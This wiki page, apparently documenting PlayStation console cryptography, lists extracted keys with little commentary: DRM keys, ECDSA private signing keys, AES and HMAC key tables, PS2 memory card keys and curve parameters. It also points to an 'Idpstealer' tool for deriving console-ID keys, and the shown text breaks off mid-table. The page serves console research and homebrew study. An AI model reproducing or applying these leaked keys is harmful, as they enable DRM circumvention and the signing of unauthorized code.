|| 4.00++ || dec || &lt;code&gt;FBDA75963FE690CFF35B7AA7B408CF631744EDEF5F7931A04D58FD6A921FFDB3&lt;/code&gt; || &lt;code&gt;F72C1D80FFDA2E3BF085F4133E6D2805&lt;/code&gt; || &lt;code&gt;637EAD34E7B85C723C627E68ABDD0419914EBED4008311731DD87FDDA2DAF71F856A70E14DA17B42&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x24&lt;/code&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x1A || 4.00++ || dec || &lt;code&gt;5EFD1E9961462794E3B9EF2A4D0C1F46F642AAE053B5025504130590E66F19C9&lt;/code&gt; || &lt;code&gt;1AC8FA3B3C90F8FDE639515F91B58327&lt;/code&gt; || &lt;code&gt;BE4B1B513536960618BFEF12A713F6673881B02F9DC616191E823FC8337CCF99ADAA6172019C0C23&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.00-4.11&lt;/span&gt; || 0x1A np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;751EE949CD3ADF50A469197494A1EC358409CCBE6E85217EBDE7A87D3FF1ABD8&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;23AE4ADA4D3F798DC5ED98000337FF77&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;1BABA87CD1AD705C462D4E7427B6DAF59A50383A348A15088F0EDFCF1ADF2B5C2B2D507B2A357D36&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x1A&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x1B || =&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;66637570D1DEC098467DB207BAEA786861964D0964D4DBAF89E76F46955D181B&lt;/code&gt; || &lt;code&gt;9F7B5713A5ED59F6B35CD8F8A165D4B8&lt;/code&gt; || &lt;code&gt;4AB6FB1F6F0C3D9219923C1AC683137AB05DF667833CC6A5E8F590E4E28FE2EB180C7D5861117CFB&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | npdrm || 4.00-4.11 || 0x1B np || =&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;BCF9BD763A7B787CF1428EF45546AF5EBB3D816ABA1C6FF2FFD3D854B71F355B&lt;/code&gt; || &lt;code&gt;D03979E47D236BD278EC7331B7DA0BD4&lt;/code&gt; || &lt;code&gt;4F30DF9F3A9D6B3AF92510F81F7961DD404F5E09BFF4D989969727509E39B94A750D12A063189848&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | app || 4.20-{{latest}} || 0x1C || 4.20++ || dec || &lt;code&gt;CFF025375BA0079226BE01F4A31F346D79F62CFB643CA910E16CF60BD9092752&lt;/code&gt; || &lt;code&gt;FD40664E2EBBA01BF359B0DCDF543DA4&lt;/code&gt; || &lt;code&gt;36C1ACE6DD5CCC0006FDF3424750FAC515FC5CFA2C93EC53C6EC2BC421708D154E91F2E7EA54A893&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x09&lt;/code&gt;<br /> |-<br /> | npdrm || 4.20-{{latest}} || 0x1C np || 4.20++ || dec || &lt;code&gt;8103EA9DB790578219C4CEDF0592B43064A7D98B601B6C7BC45108C4047AA80F&lt;/code&gt; || &lt;code&gt;246F4B8328BE6A2D394EDE20479247C5&lt;/code&gt; || &lt;code&gt;503172C9551308A87621ECEE90362D14889BFED2CF32B0B3E32A4F9FE527A41464B735E1ADBC6762&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | app || 4.20-{{latest}} || 0x1D || 4.20++ || dec || &lt;code&gt;D202174EB65A62048F3674B59EF6FE72E1872962F3E1CD658DE8D7AF71DA1F3E&lt;/code&gt; || &lt;code&gt;ACB9945914EBB7B9A31ECE320AE09F2D&lt;/code&gt; || &lt;code&gt;430322887503CF52928FAAA410FD623C7321281C8825D95F5B47EF078EFCFC44454C3AB4F00BB879&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x1A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;seven&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.20-{{latest}}&lt;/span&gt; || not &quot;0x1E&quot; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.20++&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;46BD0891224E0CE13E2162921D4BB76193AEEE4416A729FCDD111C5536BF87C9&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BF036387CDB613C0AC88A6D9D2CC5316&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;A14F6D5F9AD7EBB3B7A39A7C32F13E5DC3B0BA16BDC33D39FDDF88F4AEEA6CFEEB0C0796C917A952&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x0F&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> |}<br /> <br /> === klicensee ===<br /> <br /> ==== klic_dec_key ==== <br /> klic_dec_key : F2FBCA7A75B04EDC1390638CCDFDD1EE<br /> See: http://pastie.org/private/k2vlnqi6h8onbkxhpjuxg<br /> <br /> klic_dec_old_key : DC41D59080BFFF45547D0B3A12E591D3<br /> <br /> ==== klic_dev_key ====<br /> Found inside ps1_netemu.self &lt;br /&gt;<br /> Used as klicensee for ISO.BIN.EDAT<br /> klic_dev_key : 52C0B5CA76D6134BB45FC66CA637F2C1<br /> <br /> ==== klic_free_key ====<br /> see NPDRM OMAC Keys<br /> klic_free_key : 72F990788F9CFF745725F08E4C128387<br /> <br /> ==== RIF's act.dat index decryption key ====<br /> actdatix_dec_key : DA7D4B5E499A4F53B1C1A14A7484443B<br /> Actually in vsh.self<br /> <br /> ==== riv_key ====<br /> riv_key : 00000000000000000000000000000000<br /> (former posted value was the sha1 of 0, not a proper key. iv is all zeroes - see also [https://www.das-labor.org/trac/browser/microcontroller-2/crypto-lib/testvectors/Sha-1-160.test-vectors :/])<br /> Actually in appldr<br /> <br /> ==== klicensee constant ====<br /> klicensee_const : 5E06E04FD94A71BF0000000000000001<br /> Actually in lv2_kernel.self<br /> <br /> ==== klicensee(psp) ====<br /> Found inside psp_emulator.self &lt;br /&gt;<br /> Used as klicensee for ISO.BIN.EDAT<br /> <br /> klicensee for psp minis:<br /> <br /> klic_psp: 2A6AFBCF43D1579F7D738741A13BD42E<br /> <br /> klicensee for psp remasters:<br /> <br /> klic_pe : 0DB85732366CD734FC879E743343BB4F<br /> <br /> ==== vsh pub + curvetable ====<br /> pub : 6227B00A02856FB04108876719E0A0183291EEB96E736ABF81F70EE9161B0DDEB026761AFF7BC85B<br /> curves : 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> 0000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFE000000<br /> 00000000000000000000000000FFFFFFFE00000000000000039A2EB773FCA61DCB5236A42C6F7FEB426E5ADA06<br /> 0000000000000000FFFE4A39E80D6F151E245270DDA65311EAB7634F69577D0F51E30602711A07059FBCA7BA92<br /> F5E34D6F7216F0D828A37D413EF73F0000000000000000FFFFFFFE00000000000000000000000000000000FFFF<br /> FFFE00000000000000035974123CCBE7FD63E2C31CC465CDE0334461F0F4000000000000000100004A51C3ADC1<br /> 9C6BB0DED8ED713BDA9B780270209B1DBC843F5E092A5021D3A6A7AA814E24FFED9FBDAADB243C862A53A0B520<br /> inv_curves: FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000001FFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFC65D1488C0359E234ADC95BD3908014BD91A525F9<br /> FFFFFFFFFFFFFFFF0001B5C617F290EAE1DBAD8F2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA604358456D<br /> 0A1CB2908DE90F27D75C82BEC108C0FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000<br /> 0001FFFFFFFFFFFFFFFCA68BEDC33418029C1D3CE33B9A321FCCBB9E0F0BFFFFFFFFFFFFFFFEFFFFB5AE3C523E<br /> 63944F2127128EC4256487FD8FDF64E2437BC0A1F6D5AFDE2C5958557EB1DB001260425524DBC379D5AC5F4ADF<br /> <br /> Notes:&lt;br /&gt;<br /> *It is used for rif/act.dat signatures, for example.&lt;br /&gt;<br /> <br /> [http://www.multiupload.com/A19Q0HV7OW vsh-pub-curves.rar (367 Bytes)]<br /> <br /> == Snowden Key (in vsh.elf or vshnet.prx into old firmwares) ==<br /> 9DE004E9F2D72F6DE377699BC2E5F83A4C28EEA575DBEAA293F3835E8B7AFA9A <br /> 16573AD5B0DEEBCCE1A7C54C66B903AE4186FBD7EEB23F16E67A19420B262114 <br /> 08B91715ACC3D1998A37A4639FAFF064E9F90C0FECB28C813FA9F649074C9A33 <br /> 0392EA2B91C3FD3732D1DFED7CA151A21926F0B315107BF1FBEA8929E68AB397<br /> <br /> == VSH CryptoEngine Sha1Hmac keys ==<br /> key0 685E2534695D79096F57640044315B515E0C7E55<br /> key1 46753933634D1A1D464142752110116F2C5E7836<br /> key2 59CB6067574D873CEFD7B75A300529C18BFB75ED<br /> key3 C699CF88072F6819D5DAFA7A2EEB93E537E0ADE2<br /> key4 E8ABDAE8F81C086123FE5D6281BB0F0DEE909AF5<br /> key5 F8A05D44A04E5C036812261DB70EE1708EBC4D48<br /> key6 A3F58C9913A108BE8C1EDB889C2BF8F7578101DA<br /> key7 B6627AE4422F9D81E1421FA2B1DB02841E64B933<br /> <br /> == NPDRM stuff ==<br /> &lt;!--// needs some logical reordering in module subsection //--&gt;<br /> http://img24.imageshack.us/img24/9083/snapshote.png<br /> <br /> ==== GPKG/SELF ECDSA signature ====<br /> Public key: &lt;code&gt;E6792E446CEBA27BCADF374B99504FD8E80ADFEB3E66DE73FFE58D3291221C65018C038D3822C3C9&lt;/code&gt;&lt;br /&gt;<br /> Public bak: &lt;code&gt;D9AAEB6054307FC0FB488B15AE11B558C75FC8A3EC4907E129C5B5CD386D94D82318B9D558777C5A&lt;/code&gt;&lt;br /&gt;<br /> Curve type: 2 (vsh)&lt;br /&gt;<br /> <br /> ==== NPDRM OMAC Keys ====<br /> npdrm-omac-key-1: 72F990788F9CFF745725F08E4C128387<br /> npdrm-omac-key-2: 6BA52976EFDA16EF3C339FB2971E256B<br /> npdrm-omac-key-3: 9B515FEACF75064981AA604D91A54E97<br /> <br /> == PSISOIMG0000 ==<br /> See also : [[PSISOIMG0000]]&lt;br /&gt;<br /> <br /> Public key: <br /> &lt;code&gt;948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773&lt;/code&gt;&lt;br /&gt;<br /> Private key: <br /> &lt;code&gt;00bf21224b041f29549db25e9aade19e720a1fe0f1&lt;/code&gt;&lt;br /&gt;<br /> Curve type: 2 (vsh-curves, but can be found in ps1_netemu, too)&lt;br /&gt;<br /> This key is also used for signing content of the ISO.BIN.EDAT (decrypted form). The signature is located at the tail of the decrypted ISO.BIN.EDAT, its length is 0x28 bytes.<br /> <br /> location: inside ps1_newemu.self (example from 3.55, but same as 2.10 and higher):<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 00126AB0 94 8D A1 3E 8C AF D5 BA 0E 90 CE 43 44 61 BB 32 ”.¡&gt;Œ¯Õº..ÎCDa»2<br /> 00126AC0 7F E7 E0 80 47 5E AA 0A D3 AD 4F 5B 62 47 A7 FD .çà€G^ª.Ó­O[bG§ý<br /> 00126AD0 A8 6D F6 97 90 19 67 73 ¨mö—..gs<br /> and ps1_netemu.self (example from 3.55, but same as 1.70 and higher):<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 0016FA10 94 8D A1 3E 8C AF D5 BA 0E 90 CE 43 44 61 BB 32 ”.¡&gt;Œ¯Õº..ÎCDa»2<br /> 0016FA20 7F E7 E0 80 47 5E AA 0A D3 AD 4F 5B 62 47 A7 FD .çà€G^ª.Ó­O[bG§ý<br /> 0016FA30 A8 6D F6 97 90 19 67 73 ¨mö—..gs<br /> <br /> == DOCUMENT.DAT ==<br /> des key: 39F7EFA16CCE5F4C<br /> <br /> des iv: A819C4F5E154E30B<br /> Location: ps1_netemu.self<br /> <br /> == PS2 Keys ==<br /> MC_CARDKEY_MATERIAL_1 6C26D37F46EE9DA9 &lt;-mc_iso<br /> MC_CARDKEY_HASHKEY_1 CE62F68420B65A81E459FA9A2BB3598A &lt;-mc_iso<br /> MC_CARDKEY_MATERIAL_2 2CD160FA8C2ED362 &lt;-mc_iso<br /> MC_CARDKEY_HASHKEY_2 7014A32FCC5B1237AC1FBF4ED26D1CC1 &lt;-mc_iso<br /> MC_CHALLENGE_MATERIAL 2C5BF48D32749127 &lt;-mc_iso<br /> MG_KBIT_MATERIAL 35C860019222BB60 &lt;-me_iso<br /> MG_KC_MATERIAL 8C2BD03EC245C56D &lt;-me_iso<br /> MG_KBIT_MASTER_KEY 5001C87121F939C144D86B069224B247 &lt;- me_iso<br /> MG_KC_MASTER_KEY 77F38314B047D87C9B37D266049228C4 &lt;- me_iso<br /> META_KEY_RETAIL 389DCBA5203C8159ECF94C9393164CC9 &lt;- sb_iso<br /> DATA_KEY_RETAIL 1017823463F468C1AA41D700B140F257 &lt;- sb_iso<br /> VMC_KEY_RETAIL 64E30D19A16941D677E32EEBE07F45D2 &lt;- sb_iso<br /> META_KEY_DEBUG 2B05F7C7AFD1B169D62586503AEA9798 &lt;- sb_iso <br /> DATA_KEY_DEBUG 74FF7E5D1D7B96943BEFDCFA81FC2007 &lt;- sb_iso <br /> VMC_KEY_DEBUG 30479D4B80E89E2B59E5C9145E1064A9 &lt;- sb_iso<br /> <br /> == KIRK ==<br /> <br /> * Note: KIRK CMD11 isn't vulnerable to retrieval of private key. KIRK1 is.<br /> <br /> '''see also:'''<br /> * https://github.com/uofw/upspd/wiki/KIRK-13---ECDSA-point-multiplication<br /> * https://code.google.com/p/kirk-engine/source/browse/trunk/libkirk/kirk_engine.c<br /> * http://wololo.net/talk/viewtopic.php?f=6&amp;t=7224<br /> * http://jpcsp.googlecode.com/svn-history/r2166/trunk/src/jpcsp/crypto/CryptoEngine.java [https://github.com/codestation/mhtools/blob/master/src/jpcsp/crypto/CryptoEngine.java] / https://code.google.com/p/jpcsp/source/browse/trunk/src/jpcsp/crypto/KeyVault.java [https://github.com/codestation/mhtools/tree/master/src/keys]<br /> <br /> === Private-Public Crypto ===<br /> <br /> // KIRK CMD1 ECDSA Private Key<br /> kirk1_priv = F392E26490B80FD889F2D9722C1F34D7274F983D<br /> <br /> // PSP EDAT ECDSA Private Key<br /> edat_priv = E5C4D0A8249A6F27E5E0C9D534F4DA15223F42AD<br /> <br /> // NPUMDIMG ECDSA Private Key<br /> priv_key_npumdimg = 14B022E892CF8614A44557DB095C928DE9B89970<br /> <br /> // KIRK1 ECDSA Private Key<br /> kirk1_pub_x = ED9CE58234E61A53C685D64D51D0236BC3B5D4B9 <br /> kirk1_pub_y = 049DF1A075C0E04FB344858B61B79B69A63D2C39<br /> <br /> // PSP EDAT ECDSA Public Key<br /> edat_pub_x = 1F072BCCC162F2CFAEA0E7F4CDFD9CAEC6C45521<br /> edat_pub_y = 5301F4E370C3EDE2D4F5DBC3A7DE8CAAE8AD5B7D<br /> <br /> // NPUMDIMG ECDSA Public Key<br /> npdu_pub_x = 0121EA6ECDB23A3E2375671C5362E8E28B1E783B<br /> npdu_pub_y = 1A2732158B8CED98466C18A3AC3B1106AFB4EC3B<br /> <br /> /* ECC Curves for Kirk 1 and Kirk 11 */<br /> // Common Curve paramters p and a<br /> ec_p = FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFF<br /> ec_a = FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFC // mon<br /> <br /> // Kirk C,D,10,11,(likely 12)- Unique curve parameters for b, N, and base point G for Kirk C,D,10,11,(likely 12) service<br /> // Since public key is variable, it is not specified here<br /> ec_b2 = A68BEDC33418029C1D3CE33B9A321FCCBB9E0F0B// mon<br /> ec_N2 = 00FFFFFFFFFFFFFFFEFFFFB5AE3C523E63944F2127<br /> Gx2 = 128EC4256487FD8FDF64E2437BC0A1F6D5AFDE2C <br /> Gy2 = 5958557EB1DB001260425524DBC379D5AC5F4ADF <br /> <br /> // KIRK 1 - Unique curve parameters for b, N, and base point G<br /> // Since public key is hard coded, it is also included<br /> <br /> ec_b1 = 65D1488C0359E234ADC95BD3908014BD91A525F9<br /> ec_N1 = 00FFFFFFFFFFFFFFFF0001B5C617F290EAE1DBAD8F<br /> Gx1 = 2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA <br /> Gy1 = 604358456D0A1CB2908DE90F27D75C82BEC108C0<br /> <br /> === Private Crypto ===<br /> <br /> // KIRK CMD1 AESCBC128-CMAC key<br /> kirk1_key = 98C940975C1D10E87FE60EA3FD03A8BA<br /> <br /> // KIRK CMD4 and CMD7 AESCBC128 key table<br /> kirk7_key02 = B813C35EC64441E3DC3C16F5B45E6484 // New from PS3<br /> kirk7_key03 = 9802C4E6EC9E9E2FFC634CE42FBB4668<br /> kirk7_key04 = 99244CD258F51BCBB0619CA73830075F<br /> kirk7_key05 = 0225D7BA63ECB94A9D237601B3F6AC17<br /> kirk7_key07 = 76368B438F77D87EFE5FB6115939885C // New from PS3<br /> kirk7_key0C = 8485C848750843BC9B9AECA79C7F6018<br /> kirk7_key0D = B5B16EDE23A97B0EA17CDBA2DCDEC46E<br /> kirk7_key0E = C871FDB3BCC5D2F2E2D7729DDF826882<br /> kirk7_key0F = 0ABB336C96D4CDD8CB5F4BE0BADB9E03<br /> kirk7_key10 = 32295BD5EAF7A34216C88E48FF50D371<br /> kirk7_key11 = 46F25E8E4D2AA540730BC46E47EE6F0A<br /> kirk7_key12 = 5DC71139D01938BC027FDDDCB0837D9D<br /> kirk7_key38 = 12468D7E1C42209BBA5426835EB03303<br /> kirk7_key39 = C43BB6D653EE67493EA95FBC0CED6F8A<br /> kirk7_key3A = 2CC3CF8C2878A5A663E2AF2D715E86BA<br /> kirk7_key44 = 7DF49265E3FAD678D6FE78ADBB3DFB63 // New from PS3<br /> kirk7_key4B = 0CFD679AF9B4724FD78DD6E99642288B //1.xx game eboot.bin<br /> kirk7_key53 = AFFE8EB13DD17ED80A61241C959256B6<br /> kirk7_key57 = 1C9BC490E3066481FA59FDB600BB2870<br /> kirk7_key5D = 115A5D20D53A8DD39CC5AF410F0F186F<br /> kirk7_key63 = 9C9B1372F8C640CF1C62F5D592DDB582<br /> kirk7_key64 = 03B302E85FF381B13B8DAA2A90FF5E61 <br /> <br /> //KIRK Unknown 100 key<br /> kirk_unk100 = 000102030405060708090A0B0C0D0E0F<br /> <br /> // KIRK CMD0x10 key<br /> kirk10_key = 475E09F4A237DA9BEFFF3BC077143D8A<br /> <br /> // CHNNLSV SaveData keys<br /> sdHashKey1 = 40E6533F05113A4EA14BDAD6727C534C<br /> sdHashKey2 = FAAA50EC2FDE5493AD14B2CEA53005DF<br /> sdHashKey3 = 36A53EACC5269EA383D9EC256C484872<br /> sdHashKey4 = D8C0B0F33E6B7685FDFB4D7D451E9203<br /> sdHashKey5 = CB15F407F96A523C04B9B2EE5C53FA86<br /> sdHashKey6 = 7044A3AEEF5DA5F2857FF2D694F5363B<br /> sdHashKey7 = EC6D29592635A57F972A0DBCA3263300<br /> <br /> // AMCTRL keys<br /> amHashKey1 = 9C48B62840E6533F05113A4E65E63A64<br /> amHashKey2 = 70B47BC0A14BDAD6E01014ED727C534C<br /> amHashKey3 = E350ED1D910A1FD029BB1C3EF34077FB<br /> amHashKey4 = 135FA47CAB395BA476B8CCA98F3A0445<br /> amHashKey5 = 678D7FA32A9CA0D1508AD8385E4B017E<br /> <br /> ==Idpstealer Key?==<br /> <br /> DES encrypt 192? bit<br /> 5E5B43EF9BC2CD75B0F2AEF7FD3B199762D6C13280E50D3E 0000000000000000<br /> <br /> === Idpstealer Key Confusion ===<br /> <br /> * here's the executable (with printf) :<br /> https://mega.nz/#!FwsWwCoJ!eReYmfKNvEXMNdG7YLBrNJui1sxeN1FIRzpqEFQTikM<br /> * here's the source (with printf) : http://pastie.org/private/slfjwzyshcrsq7mnycxc0w<br /> * here's the specific function : http://pastie.org/10530594<br /> * usage: &lt;code&gt; idpstealer.exe idps.bin &lt;/code&gt;<br /> * output: &lt;code&gt; SID_KEY: 5E5B43EF9BC2CD75B0F2AEF7FD3B199762D6C13280E50D3E &lt;/code&gt;<br /> <br /> ==Sbox Values==<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! D/L !! hex !! Note <br /> |-<br /> | [http://www.multiupload.com/B5F336G4UF] <br /> | S-box (You can read more about this here http://en.wikipedia.org/wiki/Rijndael_S-box)<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> <br /> 00018F80 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 c|w{òkoÅ0.g+þ׫v<br /> 00018F90 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 Ê‚É}úYGð­Ô¢¯œ¤rÀ<br /> 00018FA0 B7 FD 93 26 36 3F F7 CC 34 A5 E5 F1 71 D8 31 15 ·ý“&amp;6?÷Ì4¥åñqØ1.<br /> 00018FB0 04 C7 23 C3 18 96 05 9A 07 12 80 E2 EB 27 B2 75 .Ç#Ã.–.š..€âë'²u<br /> 00018FC0 09 83 2C 1A 1B 6E 5A A0 52 3B D6 B3 29 E3 2F 84 .ƒ,..nZ R;Ö³)ã/„<br /> 00018FD0 53 D1 00 ED 20 FC B1 5B 6A CB BE 39 4A 4C 58 CF SÑ.í ü±[j˾9JLXÏ<br /> 00018FE0 D0 EF AA FB 43 4D 33 85 45 F9 02 7F 50 3C 9F A8 ÐïªûCM3…Eù..P&lt;Ÿ¨<br /> 00018FF0 51 A3 40 8F 92 9D 38 F5 BC B6 DA 21 10 FF F3 D2 Q£@.’.8õ¼¶Ú!.ÿóÒ<br /> 00019000 CD 0C 13 EC 5F 97 44 17 C4 A7 7E 3D 64 5D 19 73 Í..ì_—D.ħ~=d].s<br /> 00019010 60 81 4F DC 22 2A 90 88 46 EE B8 14 DE 5E 0B DB `.OÜ&quot;*.ˆFî¸.Þ^.Û<br /> 00019020 E0 32 3A 0A 49 06 24 5C C2 D3 AC 62 91 95 E4 79 à2:.I.$\ÂÓ¬b‘•äy<br /> 00019030 E7 C8 37 6D 8D D5 4E A9 6C 56 F4 EA 65 7A AE 08 çÈ7m.ÕN©lVôêez®.<br /> 00019040 BA 78 25 2E 1C A6 B4 C6 E8 DD 74 1F 4B BD 8B 8A ºx%..¦´ÆèÝt.K½‹Š<br /> 00019050 70 3E B5 66 48 03 F6 0E 61 35 57 B9 86 C1 1D 9E p&gt;µfH.ö.a5W¹†Á.ž<br /> 00019060 E1 F8 98 11 69 D9 8E 94 9B 1E 87 E9 CE 55 28 DF áø˜.iÙŽ”›.‡éÎU(ß<br /> 00019070 8C A1 89 0D BF E6 42 68 41 99 2D 0F B0 54 BB 16 Œ¡‰.¿æBhA™-.°T».<br /> | Present in all SPU binaries that perform AES (see [http://www.psdevwiki.com/ps3/AES_binaries here])<br /> |-<br /> | <br /> | Inverse AES S-box<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> <br /> 008633C0 52 09 6A D5 30 36 A5 38 BF 40 A3 9E 81 F3 D7 FB R.jХ06Ґ8ї@ЈћЃуЧы<br /> 008633D0 7C E3 39 82 9B 2F FF 87 34 8E 43 44 C4 DE E9 CB |г9‚›/я‡4ЋCDДЮйЛ<br /> 008633E0 54 7B 94 32 A6 C2 23 3D EE 4C 95 0B 42 FA C3 4E T{”2¦В#=оL•.BъГN<br /> 008633F0 08 2E A1 66 28 D9 24 B2 76 5B A2 49 6D 8B D1 25 ..Ўf(Щ$Іv[ўIm‹С%<br /> 00863400 72 F8 F6 64 86 68 98 16 D4 A4 5C CC 5D 65 B6 92 rшцd†h..Ф¤\М]e¶’<br /> 00863410 6C 70 48 50 FD ED B9 DA 5E 15 46 57 A7 8D 9D 84 lpHPэн№Ъ^.FW§Ќќ„<br /> 00863420 90 D8 AB 00 8C BC D3 0A F7 E4 58 05 B8 B3 45 06 ђШ«.ЊјУ.чдX.ёіE.<br /> 00863430 D0 2C 1E 8F CA 3F 0F 02 C1 AF BD 03 01 13 8A 6B Р,.ЏК?..БЇЅ...Љk<br /> 00863440 3A 91 11 41 4F 67 DC EA 97 F2 CF CE F0 B4 E6 73 :‘.AOgЬк—тПОрґжs<br /> 00863450 96 AC 74 22 E7 AD 35 85 E2 F9 37 E8 1C 75 DF 6E –¬t&quot;з.5…вщ7и.uЯn<br /> 00863460 47 F1 1A 71 1D 29 C5 89 6F B7 62 0E AA 18 BE 1B Gс.q.)Е‰o·b.Є.ѕ.<br /> 00863470 FC 56 3E 4B C6 D2 79 20 9A DB C0 FE 78 CD 5A F4 ьV&gt;KЖТy љЫАюxНZф<br /> 00863480 1F DD A8 33 88 07 C7 31 B1 12 10 59 27 80 EC 5F .ЭЁ3€.З1±..Y'Ђм_<br /> 00863490 60 51 7F A9 19 B5 4A 0D 2D E5 7A 9F 93 C9 9C EF `Q.©.µJ.-еzџ“Йњп<br /> 008634A0 A0 E0 3B 4D AE 2A F5 B0 C8 EB BB 3C 83 53 99 61  а;M®*х°Ил»&lt;ѓS™a<br /> 008634B0 17 2B 04 7E BA 77 D6 26 E1 69 14 63 55 21 0C 7D .+.~єwЦ&amp;бi.cU!.}<br /> |<br /> |-<br /> |}<br /> <br /> in another form (from updater in ebootroms) : http://pastie.org/10070142 | http://pastie.org/10070145<br /> <br /> == RCON ==<br /> 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00<br /> 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00<br /> 04 00 00 00 04 00 00 00 04 00 00 00 04 00 00 00<br /> 08 00 00 00 08 00 00 00 08 00 00 00 08 00 00 00<br /> 10 00 00 00 10 00 00 00 10 00 00 00 10 00 00 00<br /> 20 00 00 00 20 00 00 00 20 00 00 00 20 00 00 00<br /> 40 00 00 00 40 00 00 00 40 00 00 00 40 00 00 00<br /> 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00<br /> 1B 00 00 00 1B 00 00 00 1B 00 00 00 1B 00 00 00<br /> 36 00 00 00 36 00 00 00 36 00 00 00 36 00 00 00<br /> <br /> == Shuffles ==<br /> 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10<br /> 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11<br /> 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12<br /> 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13<br /> 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14<br /> 06 07 08 09 0A 0B 0C 0D 